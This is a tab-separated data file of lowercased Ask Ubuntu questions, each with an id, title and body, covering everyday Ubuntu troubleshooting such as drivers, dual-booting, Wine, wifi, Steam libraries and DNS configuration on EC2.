387579	i ran a .exe setup file for ms office 07	i right clicked the setup.exe for word 2007 and ran it by wine 1.2.3 after installation i clicked ok but where do i find my new office software , not in dash home , ca n't find by terminal , i just installed ubuntu 12.4 lts today so please explain and answer this please
387581	how i can know the version of the software included with each release ?	i need to know the version of any piece of software included with ubuntu and the ones that provides support before downloading and installing ubuntu . i need to know what are the versions of all the packages included with ubuntu . is there such list ?
387584	how to install internet explorer 11 on ubuntu 12.04	i would like to run ie 11 for development purpose ... i found that i can install ie from 1 to 9 using winetricks , but no ie 11 . i also found this post ask ubuntu , but the suggested tool is working only for 30 days . is there a way to install ie11 for unlimited time ? thanks in advance
387587	ubutu 13.10 hotspot not connecting on iphone and android phone	i just install ap-hotspot and follow to setup a hotspot on my ubuntu 13.10. and it start successfully and show wireless hotspot active . and it is detected by iphone5 and android 4.2.1 fine but when i connect it showing unable to connect and on android i see connecting.. then not in the range . i am in a fix .
387591	how to show `` app '' icon at previews in scale using hot corners ?	how to show `` app '' icon at previews in scale using hot corners ? right now i get only windows preview with ubuntu tweak and ccsm in 13.10 : i want the same effect but including for example , the chrome , folder ( or files ) and adobe reader icons in their respective windows previews . i tried with ccsm but i get the same result . how i can do that ? thanks
387594	how to measure gpu usage ?	using the top command in the terminal lists processes , sorted by their cpu usage ( and you can change it to sort by another parameter ) is there an equivalent for the gpu ? this fellow is asking about ram used by gpu
387598	nvidia drivers installation error ( downloaded from nvidia web site )	i download the nvidia driver from nvidia web site , it 's need be compatible with my nvidia video card : geforce gt 630m . how i understood i need execute the downloaded sudo sh ./nvidia-linux-x86_64-295.33.run . but i get the next error :
387599	ca n't boot after booting into windows	i recently installed ubuntu alongside windows 8 . then used boot repair and all was fine.the grub boot loader showed-up and had an option to boot ubuntu or windows . then i booted into windows . everything looked fine until i rebooted . after i rebooted there was just a black screen with some text saying : no boot device available sata 0 : installed sata 1 : installed sata 2 : none sata 3 : none strike the f1 key to retry boot , f2 to run setup utility when i hit the f2 key it takes me to the bios setup where i see that it is trying to use the windows boot manager instead of the ubuntu boot manager . i am not sure what i can do here , if it is of any use i do have both a ubuntu installation disk and a windows installation disk . oh and the bootinfo link from running boot repair is http : //paste.ubuntu.com/6536548/ thanks in advance for your help .
387601	is this that simple ?	i have a computer that has no operating system . i am currently downloading ubuntu to a memory stick in a usb port , later , i will try to upload it onto my computer . am i missing anything here ?
387602	properly installing a usb microphone	i have purchased an atr-2020 microphone , and i am currently trying to get it to work properly on the ubuntu platform , i have gone into the sound settings , and the atr microphone is there , but when i click on it , it highlights and changes nothing.i have found out that the computer basically wants to deal with this input as another sound card , due to the fact that the microphone has a headphone jack in order to allow it to listen to itself . how should i address this , and get the microphone working ?
387604	how to use the sudo command	when i want to install a package with the sudo command i am asked to type in my password , but nothing shows up when i do .
387607	cant get my wacom tablet to be detected , its a simple vistablet penpad its not wireless it has a usb	when i use my pen on the tablet it shows my cursor clicking , but not movement . i do not know what to do next . is there anything i can do in terminal ? its not being recognized in settings and the directions say that is the only way to program the tablet and pin to my likings .
387609	vga out to vizio hdtv display problem	i 'm running ubuntu 13.10 with an integrated intel速 945gme x86/mmx/sse2 . i 'm trying to connect my hp netbook to my 42 '' visio hdtv via vga . it works , but not too well . i get one of two results when i open and close the lid of my netbook : a forced mirrored monitor at 800x600 ( with no options to change the resolution in system settings ) which looks horrible on the hdtv , or i get the appropriate 16:9 resolution with no mirror but the hdtv display scrolls horizontally . closing the lid of my netbook kills the hdtv display even with the suspend option disabled . can explain me what 's happening here ?
387610	can ubuntu accept bitcoin donations ? it seems to be paypal only right now	ubuntu should have alternative methods for donation . paypal is very good for international donations or an ideal payment service .
387615	ubuntu ( vmware ) huge login problem	the gui says my username is `` xx '' i put the password . > black screen > go back to gui password screen so i do console mode . i put the `` xx '' username and the same password/ it says that username is not known ! so i try another username i configured during install which is very similar let 's say `` xy '' ( i think i mixed up name , username , computer name and such , in the vmware configuration with the ubuntu configuration . with the same password : the console says i 'm authentified and i log . but then i go back to gui and its back at password screen do i have to reinstall ubuntu ? thanks
387616	access denied while installing ubuntu in a lenovo u410	i have been trying to reinstall windows 8 for 7 or ubuntu on my laptop for hours and i am getting nowhere . i know there are issues with w8 as well as my particular model but none of the topics here helped me . i did learn how to restart to bios ( using advanced restart ) and this is what i get : and if i press tab this is this even bios ? how do i access secure boot ? if i pick usb hdd it says access denied , if i press windows boot check he just starts normally . in the end , i want to boot from flash drive ( it works on other machines ) .
387618	temporary `` usb '' files in ubuntu ?	browsers normally store temp files ; does the os ( ubuntu 13.10 , or its bundled image application ) also store temporary files of images opened from a usb stick ? i dropped and broke my usb stick with holiday pictures on it , but before that i had looked at them on my machine , without backing them up to the computer . any chance those files ( even if smaller versions of them ) are lying somewhere on my computer 's file system ?
387619	developing unity dash plugins	i 've got a great idea for a new dash plugin but i 'm not sure where to start . does anyone know of any reference of documentation out there that could help me get started ?
387621	enter password for keyring error	i understand this has been asked many times as i see duplicate links but its not helping me . installed ubuntu 12.10 recently but getting the keyring error . ( enter password for keyring ( default ) to unlock ) my login password does not work . when i go to password and keys to change password . i see nothing there , just a blank window . any pointers ?
387624	qt creator problems	when you open the qt creator you get the welcome screen . when i click anything it opens a new window that is see though . also now it will only stay open for a few mins then it just closes . what happened and how to fix this ?
387628	`` you are missing the following 32-bit libraries , and steam may not run : libc.so.6 '' the common fixes do n't work,	so i know this is a problem that has been asked around a lot , but i 've tried a bunch of solutions with no success . i 'm running ubuntu 12.04 ( 64 bit ) , and i just installed it yesterday . this is my first time working with linux . the error is : you are missing the following 32-bit libraries , and steam may not run : libc.so.6 things i 've tried . first , i had downloaded from the steam website . i uninstalled it , and tried again from the ubuntu software centre . sudo apt-get update sudo apt-get install ia32-libs sudo apt-get upgrade this installed a bunch of the 32 bit libraries , but did not fix the issue . this seems like the major fix for most people . the direct approach of sudo apt-get install libc.so.6 returns this : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libc.so.6 e : could n't find any package by regex 'libc.so.6' i guess libc.so.6 is n't a package , just a single file or something ? i also tried gksudo gedit /etc/ld.so.conf.d/steam.conf added these two lines , those the second one was all ready in the file , but copied over : /usr/lib32 /usr/lib/i386-linux-gnu/mesa then executed : sudo ldconfig but nothing seemed to happen , steam still does n't work . so , i feel like it is more likely that i have the library and steam is n't looking in the right place . one thing i 've seen is people usually reference /usr/local/lib/ for your library locations . however , i ca n't find where to cd into /usr/ , it is n't in my home folder . if /usr/ is the home folder , there is only a /.local folder which only has /share , no lib anywhere . sorry for my linux ignorance . i appreciate any help , i honestly have no idea how to confirm i have the library and point steam to it , or if that is even the right thing to do . edit : tried this , not entirely sure what it means ~ $ ls -l /lib32/libc* -rwxr-xr-x 1 root root 1721832 sep 30 11:06 /lib32/libc-2.15.so -rw-r -- r -- 1 root root 185928 sep 30 11:06 /lib32/libcidn-2.15.so lrwxrwxrwx 1 root root 15 sep 30 11:06 /lib32/libcidn.so.1 - > libcidn-2.15.so -rw-r -- r -- 1 root root 34316 sep 30 11:06 /lib32/libcrypt-2.15.so lrwxrwxrwx 1 root root 16 sep 30 11:06 /lib32/libcrypt.so.1 - > libcrypt-2.15.so lrwxrwxrwx 1 root root 12 sep 30 11:06 /lib32/libc.so.6 - > libc-2.15.so
387629	java memory usage ballooning to all ram when running minecraft server	when i run minecraft server , over time ( a few hours to a few days ) the memory usage by java balloons to take up all available computer memory and the server performance then degrades : lags , players lose their connection , and minecraft shows messages like `` [ server thread/warn ] : ca n't keep up ! did the system time change , or is the server overloaded ? running 3126ms behind , skipping 62 tick ( s ) '' short of stopping and restarting the minecraft server every time it degrades like this , is there a way to prevent this from happening in the first place ? thank you for your help . background : operating system : ubuntu 12.04.3 lts server server : hp proliant dl360 g5 , 2 xeon e5420 @ 2.50 ghz , 16 gb ram java version `` 1.6.0_27 '' openjdk runtime environment ( icedtea6 1.12.6 ) ( 6b27-1.12.6-1ubuntu0.12.04.4 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode ) to run minecraft i use the following , but i have tried different -xmx -xms limits with the same problem developing java -xmx2048m -xms2048m -jar minecraft_server.jar nogui monitoring memory usage with top , it starts out low and everything works fine for a while : tasks : 139 total , 1 running , 138 sleeping , 0 stopped , 0 zombie cpu ( s ) : 2.5 % us , 0.0 % sy , 0.0 % ni , 97.4 % id , 0.1 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 16433112k total , 1420264k used , 15012848k free , 10220k buffers swap : 16773116k total , 51980k used , 16721136k free , 107432k cached pid user pr ni virt res shr s % cpu % mem time+ command 5025 tom 20 0 5095m 1.0g 11m s 20 6.5 5:57.76 java 5437 tom 20 0 17344 1300 952 r 0 0.0 0:00.03 top 1 root 20 0 24332 660 112 s 0 0.0 0:01.21 init 2 root 20 0 0 0 0 s 0 0.0 0:00.05 kthreadd eventually though , it balloons to using up almost all the memory ( 97 % of the 16gb ) , res goes to 15g , virt to ~19g : tasks : 139 total , 1 running , 138 sleeping , 0 stopped , 0 zombie cpu ( s ) : 2.5 % us , 0.2 % sy , 0.0 % ni , 97.6 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 16433112k total , 16284172k used , 148940k free , 1104k buffers swap : 16773116k total , 952160k used , 15820956k free , 33824k cached pid user pr ni virt res shr s % cpu % mem time+ command 5025 tom 20 0 19.5g 15g 4292 s 20 97.1 27:20.76 java 1 root 20 0 24332 0 0 s 0 0.0 0:01.21 init 2 root 20 0 0 0 0 s 0 0.0 0:00.05 kthreadd
387630	how do i run packet tracer 6.0.1 on ubuntu 12.04.3 ?	i 'm trying to install packet tracer according to answers about 13.04. , but it does n't work . : /home/krzysztof/downloads # ./cpt601 bash : ./cpt601 : can not execute binary file : /home/krzysztof/downloads # this is what i get instead . i need it to work ! how to solve this ?
387631	upek fingerprint reader not showing up at all in terminal ( command `` lsusb '' ) in ubuntu 12.04	i 'm not experienced linux user at all and do n't know even the basics of how to work with terminal . i was just trying to enable my lenovo l530 's upek finger-print reader by following these steps at fingerprint gui at some point , i 've succeeded to enable the upek reader , so that i could see it in terminal , that said : janek @ egonbondy : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 147e:1002 upek bus 001 device 004 : id 0a5c:21e6 broadcom corp . bus 001 device 005 : id 04f2 : b2ea chicony electronics co. , ltd however , i did n't succeed to make the fingerprint gui app detect the reader . as i was trying to solve this issue , i probably disabled the upek reader , i do n't know how . now i 'm incapable to see it back , and when i type lsusb i see just this : janek @ egonbondy : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 004 : id 0a5c:21e6 broadcom corp . bus 001 device 005 : id 04f2 : b2ea chicony electronics co. , ltd thank you all in advance for a clear step-by-step explanation of what should i do in order to see my reader again , and to have it detected by fingerprint gui eventually . i 'm completely lost in the system configuration files , logs , commands , everything . i would be very grateful for any help .
387633	sudo useradd wont make home directory	i have an automatic script which works , only it just never makes a home directory . the data is extracted from a database . heres the script : $ sql -s -e `` select uid , password from registrations where processed = 0 '' \ | while read a b ; do sudo useradd $ a -p $ b -m as you can see the -m is there , but it seems to ignore it and never make a home directory and i have no idea why . i must be missing something but i 've no idea what
387634	make unity match the soda dark theme	i love the the soda dark theme for sublime text , but it does n't match the tinted colors used by unity : how can i change unity to match it ?
387638	no sound/audio on new ubuntu install	i am installing ubuntu 13.10 on my pc , but the sound device is not working . it works fine in windows 7 . the via audio driver is needed to be installed in windows 7 to work . is there a linux via driver somewhere ?
387642	why is it only recognizing 5 of 6gb of ram ?	hardware hp envy m6 sleekbook ( m6-k010dx ) 6gb ram i know it has 6gb of ram , that 's what it came with when i had windows 8 on it , but the 13.10 install i 've got ( downloaded the latest two days ago ) only sees 5 . did i configure something wrong ? settings please let me know what additional information may be necessary . i 'm very new to ubuntu .
387643	ca n't start ubuntu 12.04 in gui	after entering sudo apt-get install libqt4-dev intltool a lot of important stuff deleted automaticly . no graphic interface available anymore ! need help ! i use hotot as twitter ui on my desktop . however the search api or something was broken so i searched online for help . after some dialogue with someone online who reccomended me to type in terminal : sudo apt-get install libqt4-dev intltool which i was `` smart '' enough to do , a lot of things automaticly got deleted . now ubuntu starts in only text so i assumed the gui was broken . running the command xstart shows me that `` x '' was not installed ( anymore ) . i thought i was clever to try sudo apt-get install xorg , but this did n't help . after this i tried reinstalling the desktop sudo apt-get install ubuntu-desktop but still no results . i was n't thinking this far ahead before installing libqt4-dev intltool ( i hope to say this correct ) , so no backup was made . i do n't want to be loosing everything i have accumilated by doing a fresh install , so please help me ! -edit 08 dec 2013- tried reinstalling x with 'sudo apt-get install twm' command 'startx ' still does n't give thedesired result . fatal server error : no screens found server terminated with error ( 1 ) . closing log file xinit : giving up xinit : unable to connect to x server : no such file or directory xinit : server error -edit 09 dec 2013 as far as i am concerned this question can be closed . credits to dash_plus_java . i 'm still curious for the cause , though . i will keep looking for the actions that made me create this mishap .
387646	how to fix `` could not load shockwave flash ''	i just installed ubuntu 12.04 32bit . i ca n't watch youtube videos in firefox or chromium . i installed chrome , but it will not run . here are some details and the things i have tried : flash is installed in the software center . i tried uninstalling it , and reinstalling it . tried uninstalling flash , and installing flash player 11 from the canonical partners section of the software center . installed ubuntu restricted extras . tried the process described here which attempt to use chrome 's version of flash : http : //www.webupd8.org/2012/09/how-to-make-chromium-use-flash-player.html tried installing chrome and using that instead , but chrome will not start from dash home . when i tried to run it from terminal , i got the `` system error , do you want to report it '' message . i would really like to get flash working for chromium , as firefox is pretty slow on this computer ( it is old , with an amd athlon xp 2200+ processor ) . i 'd prefer not to have to use windows version of chrome under wine because i need to keep things simple for other people using this computer . thank you for any suggestions !
387648	how do i run and test javascript code : ide , engine app , browser ?	am a coding newbie . using codecademy.com/ and while trying some of the lessons there is a problem with testing loops . the browser crashes . have also tried labs.codecademy.com/ a nice utility but same problem . i am looking fora program or app that runs code to allow me to practice without closing the browser tab and re-starting it without significant or meaningful debugging info .
387649	installed ubuntu 12.04 alongside windows 8	i installed ubuntu 12.04 alongside windows 8 , but now when i boot the pc ( a toshiba c885-1u4 ) it will automatically boot ubuntu without letting me choose , for i am afraid i installed the ubuntu boot manager in the same partition as the win one . the only way to boot win8 for me now is to access the boot menu when starting the pc and manually select the windows boot manager over the ubuntu one . is there any way for me to fix this ? also , as you may have noticed , i am no ubuntu expert .
387651	ml-1740 printer under ubuntu 13.10 ( 64-bit ) does n't install	i 'm trying to install samsung ml-1740 printer under ubuntu 13.10 ( 64-bit ) . i use the linux driver from this site : http : //www.samsung.com/us/support/owners/product/ml-1740/xaa fresh ubuntu 13.10 requires to add two components : libqt3-mt_3.3.8-b-6ubuntu2_amd64.deb and libstdc++5_3.3.6-25ubuntu4_amd64.deb . when i run installation program there is a warning about missing component : sane - `` scanner access now easy '' - scanner api even though i think i have it installed : ubuntu software center lists simple scan version simple-scan 3.10.0-0ubuntu1 . when i try and click install anyway it looks as if everything was installed ok. unified linux driver is installed . please , re-logon your system for all the installation settings to take effect . message is shown at the end . after re-logging there is no printer under : system settings - > printers . same driver worked under ubuntu 11 ( i think 64-bit ) and 12 ( 64-bit ) . does anyone have any ideas ? are there any log files i can analyze ? thank you in advance . thompsonik
387662	ubuntu turns off in the login screen	i paid $ 20 to download ubuntu and installed it . however , it just shuts down my pc when it gets to the login screen .
387663	lost password/the user `` sara '' does n't exist	i just downloaded ubuntu 13.0 and was setting it up , and making sure that i got everything just right . and then when the log in screen i realized i forgot my password . i then rebooted and clicked left shift at the boot screen , typed in the commands and typed in `` passwd sara '' ( as my username is sara ) but it said the user `` sara '' does n't exist . i was really confused , because i just created it few seconds ago , so i went back to the login screen and it said `` sara '' as my login name . so , how am i supposed to change my lost password if it says my user does n't exist ?
387664	is there a way to check if others are logged into server when you are ?	i am logged into ubuntu server via ssh and i would like to know if another user is logged in via ssh as well . is there a command that i can run to accomplish this ?
387668	what is the preferred way to setup resolvconf on ubuntu in ec2 ?	i had been using ubuntu 10.04.3 or 11.04 . in either of these versions , hostnames like ec2-123-45-6-7.compute-1.amazonaws.com would resolve to a private in the 10.0.0.0/8 range . after upgrading to 12.04 , they now resolve to public addresses.. e.g . 184.1.2.3 . it seems it 's because ubuntu now uses resolvconf . it also appears that i 'm running named . # more /run/resolvconf/interface/eth0.dhclient domain ec2.internal nameserver 172.16.0.23 # more /run/resolvconf/interface/lo.named nameserver 127.0.0.1 /etc/resolv.conf is a symlink to /run/resolvconf/resolv.conf more /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search ec2.internal if i edit resolv.conf to point to 172.16.0.23 instead of 127.0.0.1 it works correctly , but after reboot it changes back . additionally , here is the contents of /etc/resolvconf/resolv.conf.d /etc/resolvconf/resolv.conf.d # more base nameserver 172.16.0.23 domain ec2.internal search ec2.internal /etc/resolvconf/resolv.conf.d # more head # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten /etc/resolvconf/resolv.conf.d # more original nameserver 172.16.0.23 domain ec2.internal search ec2.internal # more interface-order # interface-order ( 5 ) lo.inet* lo.dnsmasq lo.pdnsd lo. ! ( pdns|pdns-recursor ) lo tun* tap* hso* em+ ( [ 0-9 ] ) ? ( _+ ( [ 0-9 ] ) ) * p+ ( [ 0-9 ] ) p+ ( [ 0-9 ] ) ? ( _+ ( [ 0-9 ] ) ) * eth* ath* wlan* ppp* * the config files seem to be setup correctly , but it keeps going back to 127.0.0.1 . i guess it wants to point to 127.0.0.1 so it can use the local named service , which seems like a really odd thing for ubuntu to install and use by default . what am i doing wrong ? is there a 'preferred ' way of doing this , instead of messing with resolvconf should i get the local named service to resolve correctly ?
387674	novice lookin for new router	how do i know if my ubuntu 12.04 desktop pc uses adapter-g or adapter-n ? i 'm a novice and do n't know where to find the info . i have an adapter-g wireless router . when i connect through the modem , i get high speed . when i connect through the router and modem , i get slower . both are ethernet connections . i have a linksys wrt54g . i know it needs replacing for my comcast high speed but i do n't want to buy an `` n '' if it 's not compatible .
387678	how to enable display of framebuffer images ( e.g . in w3m , fbi ) within byobu ( pts ) ?	i 'm trying to run a minimal ubuntu 13.10 installation without x window system on my old laptop . one of the most useful tools i rely on in this setup is byobu ; however , it seems to prevent me from using applications capable of displaying images in framebuffer . one such program is the browser w3m ( installed with its w3m-img package ) . executed from outside byobu ( in tty1 ) , though only if preceded by sudo , it displays web pages with images loaded as expected . however , if byobu is enabled ( and thus my terminal is no longer identified as tty1 , but rather as dev/pts/1 ) , there 's no way to get w3m to display images ( no matter if i launch it with sudo or not ) . the same applies to the fbi image viewer . outside of byobu ( but again , only if i launch it with sudo ) , it works without any problems . with byobu enabled , it instead produces an error message , the relevant bit of which seems to be ioctl vt_getstate : inappropriate ioctl for device ( not a linux console ? ) as far as i understand , it all has to do something with the fact that byobu relies on a pseudo-terminal , and with some arcane permission settings ( as the sudo requirement i mentioned seems to indicate ) . thanks in advance for any help with this !
387679	qml file and app.js not found	i am a newbie in ubuntu app development . i am going through the tutorials in developer.ubuntu.com . the thing is when i created a sample ubuntu-htmui project , no .qml file is being created as explained in the tutorial . not even app.js file is being created . my qt creater version is 2.8.1 and it is based on qt 5.0.2 this screenshot shows my project structure :
387683	12.04 lts stuck on `` preparing to install ''	i am trying to install 12.04 lts from dvd and am stuck on the `` preparing to install '' screen which will not allow me to continue .
387684	does windows get deleted ?	does windows 7 stay on the computer or get deleted ? if it does delete windows i wont download ubuntu . so , does windows get deleted ? and if not how to i change back and forth between the two ?
387685	prolog programming in ubuntu	i asked this question in stackoverflow , no answer so i assumed no one knew , i might have a better chance here . i have an interest in playing and fussing with prolog , i have installed the swi-prolog and added the repository , just in case anyone is interested on which commands i used : sudo apt-add-repository ppa : swi-prolog/stable sudo apt-get update sudo apt-get install swi-prolog how do i actually begin to write prolog codes on my linux machine ? for my regular programming i use vim to write/edit/debug and terminal to compile . can i use vim to write prolog ? how do i compile or use the prolog interpreter ( i think that is what it is called ) ?
387688	keyboard map/layout scrampled after external keyboard	edit found my answer by user 'salem ' . turns out to be numlock on my laptop ( did n't think i had one since i do n't have a numpad.. ) where i found the answer : restore keyboard character mapping i used the razr lycossa keyboard for a couple of days and when i unplug the lycossa keyboard and try to use my laptop 's native keyboard the keys are scrambled . the scrambling is in the - j , k , l , u , i , o keys which become 1 , 2 ,3 ,4 ,5 ,6 respectively . i run ubuntu 12.04 lts . this only happens when lycossa keyboard is n't plugged in . if i plug it back in the lycossa keyboard inputs fine and correctly . is the lycossa overriding my settings or something ? i have tried : sudo dpkg-reconfigure console-data and sudo dpkg-reconfigure keyboard-configuration and adjusting keyboard layout ( says english in menu and when i preview it looks fine ) and the language ( also english ) . any ideas ? i would like to use my laptop 's keyboard only without the external but can not since i lost function on my jkluio keys . also , on screen keyboard works fine and i have to use it to login if i don't have the lycossa to plug in.. thanks
387690	wd tv live streaming media player	i just recently bought the wd tv live streaming media player . i called there customer support center and they could not help me . its a box that plugs into my tv by an hdmi cable . it walks you through there set-up menus . what is supposed to happen next is your supposed to share media , video , and picture files thru your tv . problem is i get get the system to even recognize my home computer.i was hoping someone had some insight on my issue . thanks
387692	i ca n't see my cursor after partial upgrade	so , i had installed a newer version of gedit and rhythmbox on ubuntu 13.10 . then , i rebooted , and it asked me to do a partial upgrade . so , i said yes and let it do its thing . i watched what it was doing , and it said it ran out of memory , but continued normally . ( it was out of memory on the partition with ubuntu on it ) . i restarted the computer again so the changes would take affect , and my login screen was almost all white . i put in my password and it logged me in and everything looked normal . then i noticed , the cursor was gone ! i have a mouse , and can click on things , but i ca n't see where i 'm moving the mouse because the cursor is gone ! how to fix this ?
387693	wifi not connecting ubuntu 12.04	i recently installed ubuntu 12.4 ( today , to be exact ) and i 'm unable to connect to my network 's wifi . i 've tried every security type just to make sure , and on none of them it has worked . i looked at a few other topics , but none of them solved the problem . basically , i 'll try to make the connection , but then i get a pop-up box asked for the password every few seconds , and then a message saying `` wireless network disconnected . '' please help . lspci : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 02:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) route -n : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.0.0.1 0.0.0.0 ug 0 0 0 eth0 10.0.0.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 lspci | grep wireless : 02:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) cat etc/modprobe.d/blacklist.conf cat : etc/modprobe.d/blacklist.conf : no such file or directory lspci -nn | grep -i network : 02:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 2230 [ 8086:0887 ] ( rev c4 )
387694	replace windows8 on lenovo ideapad with ubuntu 12.04 server	i 'm trying to replace win8 with ubuntu server 12.04 on a new lenovo s210 laptop ( 4gb mem , 500gb h/d ) . i downloaded the iso to a usb stick , disabled uefi , then tried to reboot but all i see is the date/time screen . the usb stick light has been pulsing on/off for about 30 min . who/what are the usual suspects ...
387695	video playing on media centre device pauses upon boot of ubuntu	i have a media centre in my house ( sony nsz-gs7 ) which i use to stream video from my wirelass nas network hardrive ( seagate central ) and whenever i am watching a film or episode of something and i boot up ubuntu the video pauses . this just seems strange to me . whenever i boot up in windows ( very rare occasion ) it does n't happen and whenever my flatmate boots up his mac this does n't happen but every time ubuntu loads the video pauses without fail . anyone know why this might be the case ?
387698	can not install ubuntu on hp 2000 laptop ?	for the last few days , i have been trying , googling and failing to install ubuntu alongside windows on my hp 2000 laptop . i think i may have finally succeeding in installing it , but upon restarting , the computer goes straight into windows , and does not even give me an option to choose which to boot . the way i did get it installed ( ? i think ) was to create an extended partition with the free space from the deleted recovery partition ( sda3 ) i then made the following with gparted / , boot and swap . my drive is currently partitioned as sda1 system , sda2 windows , sda3 which contains those listed above as sda5 , sda6 , sda7 , and then sda4 hp tools . ubuntu 13.10 does not recognize windows 7 . i guess my question is how do i make it allow me to choose which os to boot ? i have been trying to find a solution , but apparently i am the only person with an hp2000 laptop that wants to install and dual boot ubuntu .
387700	refurbished laptop	purchased a refurbished laptop ; love it , but the previous owner has an administrative password installed . how can i overwrite their password with my own to allow the latest ubuntu upgrade and program installations ?
387701	ubuntu server 13.10 iso does n't show install as an option	i 'm booting to a live usb with the ubuntu server 13.10 iso . when it boots , it asks for my language , i select english , and then all i see are `` test memory '' , `` boot from first hard disk '' , and `` rescue a broken system '' . how do i get the install option back ?
387702	how do i get rid of the black square on my screen ?	i have this black screen on my desktop computer screen that appears after choosing my log in name . i can however use a guest account . can anyone help me as to how to get rid of it ? i have no clue about the terminology , or what is where . so any answers would have to be step by step .
387706	installing ubuntu on and external hard drive and boot in a mac	i am trying to install ubuntu on an external drive and i have tried several ways of partitioning the drive and none have them have allowed me to boot up . the one that is featured in one of the questions on this site : install ubuntu to boot from partition on external hard drive when i install everything seems to be working and there is never an error message . however when i am choosing which drive to boot up from ( holding down option while booting ) it does not show up as an option . i am running macintosh 10.9 ( mavericks ) and i have 8gb of ram . the external hd that i am using is the seagate backup plus portable drive : http : //www.seagate.com/external-hard-drives/portable-hard-drives/standard/backup-plus/
387712	13.10 bricks surface pro ?	with the following method i was able to brick 2 different surface pros with the exact same methods . you shrink your partition on windows and disable those 2 secure-boot/uefi settings from the advanced startup screen . boot from a usb stick and install ubuntu as you should ( wireless not working as reported ) . after the installation completes , reboot ( by holding the power down because it hangs while restarting ) grub loads as usual , ubuntu login screen appears . but once you hit your keyboard a few times for your password entry it hangs . so once again hold power down to shutdown , and then reboot again . bang ! as soon as the surface pro starts , it now reports low battery warning and shuts itself . battery is full btw . no matter you plug in the charger , the machine is stuck , it always reports the battery low and you 're stuck . that 's how i bricked two surface pro 's in two days . any help regarding a recovery operation would be great .
387721	how can i set $ path for compiler	i wrote this # include < stdio.h > int main ( ) { printf ( `` hello , world ! \n '' ) ; return 0 ; } i tried to compile it using scite , it comes this cc -pedantic -os -c hello.c -o hello.o -std=c99 > exit code : 0 tried to run it , then it comes h : 1 : ./hello : not found > exit code : 127 i think the path is not correct : user @ user-aspire-5733z : ~ $ echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/user/bin : /usr/sbin : /usr/bin : /root/bin : /usr/bin : /usr/sbin : /usr/local/bin : /usr/local/sbin : /bin : /sbin : /opt/csw/bin : /opt/csw/sbin : /opt/csw/gcc3/bin : /usr/sfw/sbin : /usr/sfw/bin : /opt/csw/mysql5/bin : /home/user/bin : /usr/sbin : /usr/bin : /root/bin : /usr/bin : /usr/sbin : /usr/local/bin : /usr/local/sbin : /bin : /sbin : /opt/csw/bin : /opt/csw/sbin : /opt/csw/gcc3/bin : /usr/sfw/sbin : /usr/sfw/bin : /opt/csw/mysql5/bin : /home/user/bin : /usr/sbin : /usr/bin : /root/bin : /usr/bin : /usr/sbin : /usr/local/bin : /usr/local/sbin : /bin : /sbin : /opt/csw/bin : /opt/csw/sbin : /opt/csw/gcc3/bin : /usr/sfw/sbin : /usr/sfw/bin : /opt/csw/mysql5/bin : /bin : /bin
387723	does déjà dup backs up all configuration and packs installed ?	i´ve read that déjà dup comes with ubuntu ( i have v.13.10 ) and it backs up your files in a very easy n00b-proof way . but i´ve installed a lot of packages , and i have the unity sidebar with the icons that i want , and even the wallpaper that i like . does it backs up all that too ? how may i back up all my configurations too ? in fact that´s what i need the most , because all my files are back up daily with ubuntu one and dropbox .
387724	shotwell crop menu opens blank	when i open an image in shotwell and click crop , the crop menu appears blank . i have attached a screenshot below . it seems like a bug . is there a way to solve it and make menu appear correctly . the shotwell version is 0.15.0 . i run ubuntu 13.10 . my cpu is intel 3rd gen. ci5 and chipset is intel 77 .
